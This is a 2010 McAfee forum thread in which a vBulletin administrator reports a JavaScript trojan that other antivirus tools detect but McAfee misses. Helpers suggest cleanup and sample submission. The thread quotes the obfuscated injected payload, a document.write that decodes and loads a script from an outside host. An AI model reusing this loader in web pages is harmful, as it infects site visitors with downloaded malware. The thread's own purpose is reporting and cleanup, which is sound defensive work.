cancel
Showing results for 
Search instead for 
Did you mean: 
mschmid
Level 7

McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Kaspersky and NOD32 are detecting a troyan (Trojan-Downloader.JS.Pegel.c respectively JS/TrojanDownloader.Agent.NRO), why McAfee does not? Isn't it a Troyan?

It attached istself to .js and .html files on a server.

I am using the latest McAfee VirusScan of Jan. 23. 2010:

Version 13.15

Build 13.15.113

AffId: 0

Language: de, 13.15.108

DAT.- Version :5870.0000

Engine-Version: 5301.4018

I could provide the warning-provoking code as text if this helps.

0 Kudos
12 Replies
CrazyChuck
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Please post the warning provoking as a text if you can do that. It would be most helpful under your situation.

0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Here it comes: be careful

* * * * WARNING: porbably malicious code between * * * * * *

/*Exception*/ document.write('<script src='+'h@(t$$t))(#p$@(:&/(#&&/$)a((l^&l@@a$^b)@)#!o()&)u$t!#-((c^!o!&$-()^j&@p)&@.&(c$@l(!i!(c!&!k@#s^!o)@$^!r$(@.!^&c)@(&o@m!(#.&!!b$a^&s##e&$c)$#a@$^$m))@(p)(#h!q@#)-#c@o(m)@@.^@g$!@r$#e^^^e^&n!@(s(@#c@)#)(o($^m)#e&t)!#r#$&&u@^&(e^#&$.)(r(^!u^$(:@^^8&(0)^#&8(&0^!(/(n(@e!x@t#!a(g)).#c(!o@!m$!$/)(n!!^e!)x(##t(a@!@g@!&&.$&@c!)&o@@$m!((/(e&)(b@a#&^)y!^^.!$#f(r)/&#r^$^e!(p&u#)@b)(b)^)l!i$c&!a).((&i!&(^t)/!&g@)&&!o^$#o#(g&$&@l#e&.!c^)!#&o(@&^m$@&/&'.replace(/\)|\!|\$|#|@|\^|\(|&/ig, '')+' defer=defer></scr'+'ipt>');

* * * * WARNING: porbably malicious code between * * * * * *

0 Kudos

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

hi,

if files in your website are infected with the trojan code, then use

Trojan-Downloader.JS.Pegel.c cleanup script to remove all type of the infection strings.

There are wide variety of the string types, so if that script dont remove codes in your files, then update me with the new codes.

I will add signature for the new code.

Message was edited by: sameer shelavale on 2/3/10 12:16:19 AM CST
0 Kudos
CrazyChuck
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

You're right about the careful part. Until we find out from a better person hold on tight. Let's see if we can get a knowledgeable person on this rat. This is some nasty stuff here. Have you used the scan yet? How many files are in your McAfee Security Center after PC Stratup files scanned registry ?

Message was edited by: CrazyChuck on 1/23/10 5:01:54 PM CST

Message was edited by: CrazyChuck on 1/23/10 5:20:20 PM CST
0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Hi Chuck

Thanks for responding

 Have you used the scan yet. How many files are in your registry ?

I am one of many administators of a forum (vBulletin). The problem was that those users/visitors having Kaspersky or NOD32 enabled couldn't access anymore certain parts of the forum (on Jan.22.2010. One of us admins had a look on the file structure of the server (not a fully dedicated server) and discovered that many .php .html and .js files had a new time and date stamp of Jan. 22. 2010). So he started to download the suspicious stuff to scan it locally and detected the altered part by comparing with older file versions. By now he has manually desinfected several hundered files. Seems that the infection spreaded only or mostly by executing the index.php files. Danges seems banned for the moment.

I have no idea what effect the code has on a non server machine (local PC) but at least it doesn't seem to be highly contaminous.

Regards,

Markus

P.S.

This is what virustotal.com (free online scanner) returned. I had submitted the code as "nanu.txt":

http://www.virustotal.com/es/analisis/0fc9f2300e92d8e01872c58e3d0cb411c93cd94bb03d366c193dd3c30a8b3b...

El mensaje fue editado por: mschmid on 23/01/10 17:31:08 CST

El mensaje fue editado por: mschmid on 23/01/10 17:31:59 CST
0 Kudos
CrazyChuck
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Thanks Markus. It appears to be some vicious stuff.

Message was edited by: CrazyChuck on 1/24/10 2:29:59 PM CST

Message was edited by: CrazyChuck on 1/24/10 2:38:30 PM CST
0 Kudos
SamSwift
Level 12

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Hi,

please submit the file(s) to us here - before doing so you'll need to zip them and password protect the zip with the word infected.

Thanks,

Sam

0 Kudos
CrazyChuck
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Question:

Do I or, any McAfee users here at the Community have a problem with this contamination, here ?

Message was edited by: CrazyChuck on 1/24/10 2:34:20 PM CST
0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect troyan: Trojan-Downloader.JS.Pegel.c

Thanks Sam,

Infected file submitted.

Regards,

Markus

0 Kudos